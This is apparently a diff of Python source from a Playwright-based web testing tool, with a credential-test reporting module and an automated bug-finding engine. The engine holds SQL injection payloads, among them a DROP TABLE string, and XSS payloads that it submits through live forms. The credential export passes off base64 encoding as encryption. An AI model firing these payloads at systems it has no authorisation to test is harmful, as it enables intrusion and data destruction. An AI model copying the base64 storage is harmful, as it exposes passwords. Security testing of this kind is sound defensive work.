                category: {
                    "total": len(results),
                    "passed": sum(1 for r in results if r.success),
                    "failed": sum(1 for r in results if not r.success)
                }
                for category, results in by_category.items()
            },
            "by_validity": {
                validity: {
                    "total": len(results),
                    "passed": sum(1 for r in results if r.success),
                    "failed": sum(1 for r in results if not r.success)
                }
                for validity, results in by_validity.items()
            },
            "by_response_type": {
                response_type: {
                    "total": len(results),
                    "passed": sum(1 for r in results if r.success),
                    "failed": sum(1 for r in results if not r.success)
                }
                for response_type, results in by_response_type.items()
            },
            "detailed_results": [
                {
                    "credential_name": result.credential_set.name,
                    "email": result.credential_set.email,
                    "category": result.credential_set.category,
                    "is_valid": result.credential_set.is_valid,
                    "success": result.success,
                    "response_type": result.response_type,
                    "error_message": result.error_message,
                    "screenshot_path": result.screenshot_path,
                    "timestamp": result.timestamp.isoformat() if result.timestamp else None
                }
                for result in self.test_results
            ],
            "recommendations": self._generate_credential_recommendations()
        }

        return report
|
| 538 |
+
|
| 539 |
+
    def _generate_credential_recommendations(self) -> List[str]:
        """Generate recommendations based on credential test results.

        Heuristic thresholds: valid-credential success below 50%, invalid
        rejection below 80%, or security payloads "passing" above 30% each
        trigger a warning. Returns at least one message.
        """
        recommendations = []

        if not self.test_results:
            return ["No test results available for recommendations"]

        # Analyze results
        valid_creds = [r for r in self.test_results if r.credential_set.is_valid]
        invalid_creds = [r for r in self.test_results if not r.credential_set.is_valid]

        # Check if valid credentials are working
        valid_success_rate = sum(1 for r in valid_creds if r.success) / len(valid_creds) if valid_creds else 0
        if valid_success_rate < 0.5:
            recommendations.append("⚠️ Valid credentials are not working properly. Check authentication system.")

        # Check if invalid credentials are properly rejected
        invalid_rejection_rate = sum(1 for r in invalid_creds if not r.success) / len(invalid_creds) if invalid_creds else 0
        if invalid_rejection_rate < 0.8:
            recommendations.append("🔒 Invalid credentials are not being properly rejected. Improve validation.")

        # Check for security issues
        security_tests = [r for r in self.test_results if r.credential_set.category == "security_test"]
        if security_tests:
            security_success_rate = sum(1 for r in security_tests if r.success) / len(security_tests)
            if security_success_rate > 0.3:
                recommendations.append("🚨 Security tests are passing when they should fail. Implement proper input sanitization.")

        # Check response types
        response_types = [r.response_type for r in self.test_results]
        if "unknown" in response_types:
            recommendations.append("❓ Some tests returned unknown responses. Improve error handling and user feedback.")

        if not recommendations:
            recommendations.append("✅ All credential tests are working as expected!")

        return recommendations
|
| 576 |
+
|
| 577 |
+
    def export_credentials(self, file_path: str) -> bool:
        """Export credentials to a file (encrypted).

        NOTE(review): despite the name, this is base64 encoding only —
        obfuscation, not encryption. Passwords are trivially recoverable by
        anyone with the file; replace with real encryption (e.g. Fernet)
        before production use. Returns True on success, False on failure.
        """
        try:
            # Simple encryption (in production, use proper encryption)
            encrypted_data = base64.b64encode(
                json.dumps([{
                    "name": cred.name,
                    "email": cred.email,
                    "password": cred.password,
                    "description": cred.description,
                    "category": cred.category,
                    "created_at": cred.created_at.isoformat()
                } for cred in self.credential_sets]).encode()
            ).decode()

            with open(file_path, 'w') as f:
                f.write(encrypted_data)

            logger.info(f"✅ Credentials exported to: {file_path}")
            return True

        except Exception as e:
            logger.error(f"❌ Error exporting credentials: {e}")
            return False
|
| 601 |
+
|
| 602 |
+
    def import_credentials(self, file_path: str) -> bool:
        """Import credentials from a file.

        Reads a file produced by export_credentials() (base64-encoded JSON)
        and appends each entry to self.credential_sets. The is_valid flag is
        re-derived from the email/password format rather than trusted from
        the file. Returns True on success, False on failure.
        """
        try:
            with open(file_path, 'r') as f:
                encrypted_data = f.read()

            # Simple decryption (mirror of the base64 encoding in export)
            decrypted_data = json.loads(base64.b64decode(encrypted_data).decode())

            for cred_data in decrypted_data:
                credential_set = CredentialSet(
                    name=cred_data["name"],
                    email=cred_data["email"],
                    password=cred_data["password"],
                    description=cred_data["description"],
                    is_valid=self._validate_credentials(cred_data["email"], cred_data["password"]),
                    category=cred_data["category"],
                    created_at=datetime.fromisoformat(cred_data["created_at"])
                )
                self.credential_sets.append(credential_set)

            logger.info(f"✅ Credentials imported from: {file_path}")
            return True

        except Exception as e:
            logger.error(f"❌ Error importing credentials: {e}")
            return False
|
src/utils/enhanced_ai_testing.py
ADDED
|
@@ -0,0 +1,635 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Enhanced AI Testing Engine
|
| 3 |
+
====================================================================
|
| 4 |
+
|
| 5 |
+
Enhanced AI testing engine that aggressively finds errors, bugs, and issues
|
| 6 |
+
with comprehensive test scenarios and intelligent bug detection.
|
| 7 |
+
|
| 8 |
+
Author: Mejbaur Bahar Fagun
|
| 9 |
+
Role: Software Engineer in Test
|
| 10 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 11 |
+
"""
|
| 12 |
+
|
| 13 |
+
import asyncio
|
| 14 |
+
import random
|
| 15 |
+
import string
|
| 16 |
+
from typing import List, Dict, Any, Optional
|
| 17 |
+
from playwright.async_api import Page, Locator
|
| 18 |
+
import logging
|
| 19 |
+
from dataclasses import dataclass
|
| 20 |
+
from enum import Enum
|
| 21 |
+
|
| 22 |
+
logger = logging.getLogger(__name__)
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
class BugSeverity(Enum):
    """Bug severity levels, listed from most to least severe."""
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
@dataclass
class BugReport:
    """Bug report structure."""
    title: str  # short, human-readable summary of the defect
    severity: BugSeverity
    description: str
    steps_to_reproduce: List[str]  # ordered reproduction steps
    expected_behavior: str
    actual_behavior: str
    url: str  # page on which the bug was observed
    element_info: Dict[str, Any]  # details of the offending element (selector, attributes, ...)
    recommendations: List[str]  # suggested remediation actions
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
class EnhancedAITestingEngine:
    """Enhanced AI testing engine with aggressive bug finding capabilities."""

    def __init__(self):
        # Bug reports accumulated across test runs.
        self.bugs_found: List[BugReport] = []
        # Static catalogs that drive the test campaign.
        self.test_scenarios = self._load_test_scenarios()
        self.bug_patterns = self._load_bug_patterns()
        self.performance_thresholds = self._load_performance_thresholds()
|
| 56 |
+
|
| 57 |
+
    def _load_test_scenarios(self) -> Dict[str, List[Dict[str, Any]]]:
        """Load comprehensive test scenarios.

        Returns a static catalog keyed by test area (navigation, form_testing,
        ui_testing, performance, security); each entry names an "action"
        identifier and a human-readable "description".
        """
        return {
            "navigation": [
                {"action": "rapid_navigation", "description": "Rapidly navigate between pages"},
                {"action": "back_forward", "description": "Test browser back/forward buttons"},
                {"action": "refresh_test", "description": "Test page refresh functionality"},
                {"action": "url_manipulation", "description": "Test URL manipulation and direct access"}
            ],
            "form_testing": [
                {"action": "empty_submission", "description": "Submit forms with empty fields"},
                {"action": "invalid_data", "description": "Submit forms with invalid data"},
                {"action": "sql_injection", "description": "Test for SQL injection vulnerabilities"},
                {"action": "xss_attempts", "description": "Test for XSS vulnerabilities"},
                {"action": "large_data", "description": "Submit forms with large amounts of data"},
                {"action": "special_characters", "description": "Test with special characters"},
                {"action": "unicode_testing", "description": "Test with Unicode characters"},
                {"action": "script_injection", "description": "Test for script injection"}
            ],
            "ui_testing": [
                {"action": "responsive_test", "description": "Test responsive design"},
                {"action": "accessibility_test", "description": "Test accessibility features"},
                {"action": "hover_effects", "description": "Test hover effects and interactions"},
                {"action": "click_areas", "description": "Test clickable areas and buttons"},
                {"action": "scroll_behavior", "description": "Test scrolling behavior"},
                {"action": "zoom_testing", "description": "Test zoom functionality"},
                {"action": "keyboard_navigation", "description": "Test keyboard navigation"}
            ],
            "performance": [
                {"action": "load_time_test", "description": "Test page load times"},
                {"action": "resource_loading", "description": "Test resource loading performance"},
                {"action": "memory_usage", "description": "Monitor memory usage"},
                {"action": "cpu_usage", "description": "Monitor CPU usage"},
                {"action": "network_latency", "description": "Test network latency"}
            ],
            "security": [
                {"action": "csrf_test", "description": "Test for CSRF vulnerabilities"},
                {"action": "clickjacking", "description": "Test for clickjacking vulnerabilities"},
                {"action": "session_management", "description": "Test session management"},
                {"action": "authentication", "description": "Test authentication mechanisms"},
                {"action": "authorization", "description": "Test authorization controls"}
            ]
        }
|
| 100 |
+
|
| 101 |
+
def _load_bug_patterns(self) -> Dict[str, List[str]]:
|
| 102 |
+
"""Load bug detection patterns."""
|
| 103 |
+
return {
|
| 104 |
+
"ui_bugs": [
|
| 105 |
+
"Element not visible",
|
| 106 |
+
"Element not clickable",
|
| 107 |
+
"Layout broken",
|
| 108 |
+
"Text overflow",
|
| 109 |
+
"Image not loading",
|
| 110 |
+
"Button not responding",
|
| 111 |
+
"Form validation missing",
|
| 112 |
+
"Error message not displayed",
|
| 113 |
+
"Loading state not handled",
|
| 114 |
+
"Responsive design issues"
|
| 115 |
+
],
|
| 116 |
+
"functional_bugs": [
|
| 117 |
+
"Function not working",
|
| 118 |
+
"Data not saved",
|
| 119 |
+
"Validation bypassed",
|
| 120 |
+
"Error not handled",
|
| 121 |
+
"State not maintained",
|
| 122 |
+
"Navigation broken",
|
| 123 |
+
"Search not working",
|
| 124 |
+
"Filter not applied",
|
| 125 |
+
"Sort not working",
|
| 126 |
+
"Pagination broken"
|
| 127 |
+
],
|
| 128 |
+
"performance_bugs": [
|
| 129 |
+
"Page load too slow",
|
| 130 |
+
"Memory leak detected",
|
| 131 |
+
"CPU usage high",
|
| 132 |
+
"Network timeout",
|
| 133 |
+
"Resource not optimized",
|
| 134 |
+
"Caching issues",
|
| 135 |
+
"Database slow query",
|
| 136 |
+
"API response slow",
|
| 137 |
+
"Image not optimized",
|
| 138 |
+
"JavaScript blocking"
|
| 139 |
+
],
|
| 140 |
+
"security_bugs": [
|
| 141 |
+
"SQL injection possible",
|
| 142 |
+
"XSS vulnerability",
|
| 143 |
+
"CSRF token missing",
|
| 144 |
+
"Authentication bypass",
|
| 145 |
+
"Authorization issue",
|
| 146 |
+
"Data exposure",
|
| 147 |
+
"Session hijacking",
|
| 148 |
+
"Clickjacking possible",
|
| 149 |
+
"Input not sanitized",
|
| 150 |
+
"Error information leaked"
|
| 151 |
+
]
|
| 152 |
+
}
|
| 153 |
+
|
| 154 |
+
def _load_performance_thresholds(self) -> Dict[str, float]:
|
| 155 |
+
"""Load performance thresholds."""
|
| 156 |
+
return {
|
| 157 |
+
"page_load_time": 3.0, # seconds
|
| 158 |
+
"element_interaction_time": 1.0, # seconds
|
| 159 |
+
"form_submission_time": 2.0, # seconds
|
| 160 |
+
"navigation_time": 1.5, # seconds
|
| 161 |
+
"memory_usage_mb": 100.0, # MB
|
| 162 |
+
"cpu_usage_percent": 80.0, # percentage
|
| 163 |
+
}
|
| 164 |
+
|
| 165 |
+
async def run_comprehensive_testing(self, page: Page) -> List[BugReport]:
    """Run every AI test suite against *page* and return the bugs collected.

    Suites run sequentially; each one appends its findings to
    ``self.bugs_found`` (via ``_add_bug_report``), which is cleared first so
    repeated runs do not accumulate stale reports.
    """
    logger.info("🤖 Starting comprehensive AI testing...")
    self.bugs_found.clear()
    # Fixed order: navigation, forms, UI, performance, security.
    for suite in (
        self._test_navigation_scenarios,
        self._test_form_scenarios,
        self._test_ui_scenarios,
        self._test_performance_scenarios,
        self._test_security_scenarios,
    ):
        await suite(page)
    logger.info(f"🔍 Found {len(self.bugs_found)} bugs/issues during testing")
    return self.bugs_found
|
| 181 |
+
|
| 182 |
+
async def _test_navigation_scenarios(self, page: Page):
    """Run the navigation-related checks; a failure in one aborts the rest."""
    logger.info("🧭 Testing navigation scenarios...")
    try:
        # Rapid clicking, history traversal, refresh, then URL manipulation.
        checks = (
            self._rapid_navigation_test,
            self._back_forward_test,
            self._refresh_test,
            self._url_manipulation_test,
        )
        for check in checks:
            await check(page)
    except Exception as e:
        logger.error(f"Navigation testing error: {e}")
|
| 201 |
+
|
| 202 |
+
async def _test_form_scenarios(self, page: Page):
    """Run the full battery of form-abuse checks against every <form> on the page."""
    logger.info("📝 Testing form scenarios...")
    try:
        # Per-form checks, ordered from benign (empty submit) to hostile
        # (injection payloads, oversized input, special characters).
        checks = (
            self._test_empty_form_submission,
            self._test_invalid_form_data,
            self._test_sql_injection_forms,
            self._test_xss_forms,
            self._test_large_form_data,
            self._test_special_characters,
        )
        for form in await page.query_selector_all('form'):
            for check in checks:
                await check(form, page)
    except Exception as e:
        logger.error(f"Form testing error: {e}")
|
| 231 |
+
|
| 232 |
+
async def _test_ui_scenarios(self, page: Page):
    """Run the visual/interaction checks; any raised error stops the suite."""
    logger.info("🎨 Testing UI scenarios...")
    try:
        for check in (
            self._test_responsive_design,
            self._test_accessibility,
            self._test_hover_effects,
            self._test_clickable_areas,
            self._test_scrolling_behavior,
        ):
            await check(page)
    except Exception as e:
        logger.error(f"UI testing error: {e}")
|
| 254 |
+
|
| 255 |
+
async def _test_performance_scenarios(self, page: Page):
    """Run the performance measurements (load time, resources, memory, network)."""
    logger.info("⚡ Testing performance scenarios...")
    try:
        for check in (
            self._test_page_load_time,
            self._test_resource_loading,
            self._test_memory_usage,
            self._test_network_performance,
        ):
            await check(page)
    except Exception as e:
        logger.error(f"Performance testing error: {e}")
|
| 274 |
+
|
| 275 |
+
async def _test_security_scenarios(self, page: Page):
    """Run the page-level security probes (CSRF, clickjacking, session, auth)."""
    logger.info("🔒 Testing security scenarios...")
    try:
        for check in (
            self._test_csrf_vulnerabilities,
            self._test_clickjacking,
            self._test_session_management,
            self._test_authentication,
        ):
            await check(page)
    except Exception as e:
        logger.error(f"Security testing error: {e}")
|
| 294 |
+
|
| 295 |
+
async def _rapid_navigation_test(self, page: Page):
    """Click the first few links in quick succession and watch for errors.

    Bug fix: the previous version captured all link ElementHandles once and
    then clicked them in turn. After the first click navigated away, the
    remaining handles were stale, so clicks 2 and 3 always raised and were
    mis-reported as real "Navigation Failure" bugs. Links are now re-queried
    before every click.

    Args:
        page: the Playwright page under test; may navigate during the test.
    """
    try:
        links = await page.query_selector_all('a[href]')
        # Only meaningful on pages with a handful of links to cycle through.
        if len(links) <= 3:
            return
        for i in range(3):
            try:
                # Re-fetch: the previous click may have navigated, invalidating
                # the handles captured on the old document.
                links = await page.query_selector_all('a[href]')
                if i >= len(links):
                    break
                await links[i].click()
                await page.wait_for_timeout(500)  # deliberately short — "rapid"

                # Ask the injected monitor whether the click produced JS errors.
                if await self._check_for_errors(page):
                    self._add_bug_report(
                        title="Rapid Navigation Error",
                        severity=BugSeverity.MEDIUM,
                        description="Error occurred during rapid navigation",
                        steps_to_reproduce=["Navigate rapidly between pages", "Click multiple links quickly"],
                        expected_behavior="Navigation should work smoothly",
                        actual_behavior="Error occurred during navigation",
                        url=page.url,
                        element_info={"link_index": i},
                        recommendations=["Add loading states", "Implement proper error handling"]
                    )
            except Exception as e:
                # A genuine click/navigation failure (not a stale handle).
                self._add_bug_report(
                    title="Navigation Failure",
                    severity=BugSeverity.HIGH,
                    description=f"Failed to navigate: {str(e)}",
                    steps_to_reproduce=["Click on navigation link", "Observe error"],
                    expected_behavior="Navigation should work",
                    actual_behavior=f"Navigation failed: {str(e)}",
                    url=page.url,
                    element_info={"link_index": i},
                    recommendations=["Fix navigation logic", "Add error handling"]
                )
    except Exception as e:
        logger.error(f"Rapid navigation test error: {e}")
|
| 335 |
+
|
| 336 |
+
async def _test_empty_form_submission(self, form: Locator, page: Page):
    """Submit *form* with all fields empty and verify that some validation fires.

    Bug fix: the old check only searched for error-styled DOM nodes
    (``.error``/``.invalid``). Forms protected purely by native HTML5
    constraint validation (``required``/``pattern``) block the submit without
    adding any such elements, so they were falsely reported as unvalidated.
    We now also treat the presence of an ``:invalid`` field as proof that
    validation exists.

    Args:
        form: handle to the <form> element under test.
        page: the page hosting the form (used for page-wide error lookup).
    """
    try:
        inputs = await form.query_selector_all('input, textarea, select')
        if not inputs:
            return  # nothing to validate

        submit_button = await form.query_selector('button[type="submit"], input[type="submit"]')
        if not submit_button:
            return

        await submit_button.click()
        await page.wait_for_timeout(1000)

        # Custom (scripted) validation usually surfaces as error-styled nodes.
        error_elements = await page.query_selector_all('.error, .invalid, [class*="error"], [class*="invalid"]')

        # Native constraint validation leaves fields matching :invalid and
        # suppresses the submit without touching the DOM.
        native_validation = False
        try:
            native_validation = await form.evaluate("f => f.querySelector(':invalid') !== null")
        except Exception:
            # The form handle may be stale if the submit navigated away.
            pass

        if not error_elements and not native_validation:
            self._add_bug_report(
                title="Missing Form Validation",
                severity=BugSeverity.HIGH,
                description="Form accepts empty submissions without validation",
                steps_to_reproduce=["Leave form fields empty", "Submit form"],
                expected_behavior="Form should show validation errors",
                actual_behavior="Form submitted without validation",
                url=page.url,
                element_info={"form_action": await form.get_attribute("action")},
                recommendations=["Add client-side validation", "Add server-side validation"]
            )
    except Exception as e:
        logger.error(f"Empty form submission test error: {e}")
|
| 366 |
+
|
| 367 |
+
async def _test_sql_injection_forms(self, form: Locator, page: Page):
    """Test forms for SQL injection vulnerabilities.

    Fills each free-text field with classic SQLi payloads, submits the form,
    and scans the resulting page HTML for database error signatures whose
    presence implies unsanitized input reaching a query.

    Args:
        form: handle to the <form> element under test.
        page: page hosting the form; its content is inspected after submit.
    """
    try:
        # Only free-text fields are meaningful targets for injection strings.
        inputs = await form.query_selector_all('input[type="text"], input[type="email"], textarea')

        # Classic boolean / stacked-query / union / comment payloads.
        sql_payloads = [
            "' OR '1'='1",
            "'; DROP TABLE users; --",
            "' UNION SELECT * FROM users --",
            "admin'--",
            "' OR 1=1#"
        ]

        for input_field in inputs:
            for payload in sql_payloads:
                try:
                    await input_field.fill(payload)
                    submit_button = await form.query_selector('button[type="submit"], input[type="submit"]')
                    if submit_button:
                        await submit_button.click()
                        await page.wait_for_timeout(1000)

                        # Check for SQL error messages
                        # Signature strings leaked by common drivers (MySQL,
                        # Oracle, MSSQL, PostgreSQL) when a query breaks.
                        content = await page.content()
                        sql_errors = [
                            "mysql_fetch_array", "ORA-01756", "Microsoft OLE DB Provider",
                            "SQLServer JDBC Driver", "PostgreSQL query failed", "Warning: mysql_",
                            "valid MySQL result", "MySqlClient.", "SQL syntax"
                        ]

                        # Report on the first matching signature only (break),
                        # so one payload yields at most one bug report.
                        for error in sql_errors:
                            if error.lower() in content.lower():
                                self._add_bug_report(
                                    title="SQL Injection Vulnerability",
                                    severity=BugSeverity.CRITICAL,
                                    description=f"SQL injection vulnerability detected with payload: {payload}",
                                    steps_to_reproduce=[f"Enter payload: {payload}", "Submit form"],
                                    expected_behavior="Input should be sanitized",
                                    actual_behavior="SQL injection successful",
                                    url=page.url,
                                    element_info={"payload": payload, "error": error},
                                    recommendations=["Use parameterized queries", "Sanitize input", "Implement proper validation"]
                                )
                                break

                    # Clear input for next test
                    # NOTE(review): if the submit navigated away, this handle is
                    # stale and the fill raises into the except below — confirm
                    # whether that best-effort behavior is intended.
                    await input_field.fill("")

                except Exception as e:
                    # Per-payload failures are non-fatal; move to the next one.
                    logger.warning(f"SQL injection test error: {e}")
                    continue
    except Exception as e:
        logger.error(f"SQL injection form test error: {e}")
|
| 420 |
+
|
| 421 |
+
async def _test_xss_forms(self, form: Locator, page: Page):
    """Test forms for XSS vulnerabilities.

    Fills each free-text field with common XSS payloads, submits the form,
    and flags the form as vulnerable when the raw payload is reflected
    verbatim in the resulting page HTML (i.e. not escaped or stripped).

    Args:
        form: handle to the <form> element under test.
        page: page hosting the form; its content is inspected after submit.
    """
    try:
        inputs = await form.query_selector_all('input[type="text"], input[type="email"], textarea')

        # Script tag, event-handler, javascript: URL, SVG and iframe vectors.
        xss_payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "javascript:alert('XSS')",
            "<svg onload=alert('XSS')>",
            "<iframe src=javascript:alert('XSS')></iframe>"
        ]

        for input_field in inputs:
            for payload in xss_payloads:
                try:
                    await input_field.fill(payload)
                    submit_button = await form.query_selector('button[type="submit"], input[type="submit"]')
                    if submit_button:
                        await submit_button.click()
                        await page.wait_for_timeout(1000)

                        # Check if payload is reflected
                        # NOTE(review): a verbatim substring match can false-
                        # positive when the payload is echoed inside an escaped
                        # attribute value — confirm acceptable for this tool.
                        content = await page.content()
                        if payload in content:
                            self._add_bug_report(
                                title="XSS Vulnerability",
                                severity=BugSeverity.CRITICAL,
                                description=f"XSS vulnerability detected with payload: {payload}",
                                steps_to_reproduce=[f"Enter payload: {payload}", "Submit form"],
                                expected_behavior="Input should be sanitized",
                                actual_behavior="XSS payload reflected",
                                url=page.url,
                                element_info={"payload": payload},
                                recommendations=["Sanitize output", "Use CSP headers", "Validate input"]
                            )

                    # Clear input for next test
                    # NOTE(review): stale if the submit navigated; the raise is
                    # caught below and the loop continues.
                    await input_field.fill("")

                except Exception as e:
                    logger.warning(f"XSS test error: {e}")
                    continue
    except Exception as e:
        logger.error(f"XSS form test error: {e}")
|
| 466 |
+
|
| 467 |
+
async def _test_responsive_design(self, page: Page):
    """Check common breakpoints for horizontal overflow.

    Bug fixes vs. the previous version:

    * The old code flagged any element taller than the viewport — but pages
      scroll vertically by design, so virtually every page was reported as
      broken. Only *horizontal* overflow (element extends past the right edge
      of the viewport) is treated as a responsive-design defect now.
    * At most one report is raised per viewport instead of one per
      overflowing element, keeping the bug list readable.

    Args:
        page: the page under test; its viewport is resized during the check.
    """
    try:
        viewports = [
            {"width": 320, "height": 568},    # iPhone SE
            {"width": 375, "height": 667},    # iPhone 8
            {"width": 768, "height": 1024},   # iPad
            {"width": 1024, "height": 768},   # Desktop
            {"width": 1920, "height": 1080},  # Large desktop
        ]

        for viewport in viewports:
            await page.set_viewport_size(viewport)
            await page.wait_for_timeout(500)  # let CSS media queries settle

            for element in await page.query_selector_all('*'):
                try:
                    box = await element.bounding_box()
                    # Horizontal overflow: the element's right edge extends
                    # past the viewport's right edge.
                    if box and box['x'] + box['width'] > viewport['width']:
                        self._add_bug_report(
                            title="Responsive Design Issue",
                            severity=BugSeverity.MEDIUM,
                            description=f"Element overflows viewport at {viewport['width']}x{viewport['height']}",
                            steps_to_reproduce=[f"Set viewport to {viewport['width']}x{viewport['height']}", "Check layout"],
                            expected_behavior="Elements should fit within viewport",
                            actual_behavior="Element overflows viewport",
                            url=page.url,
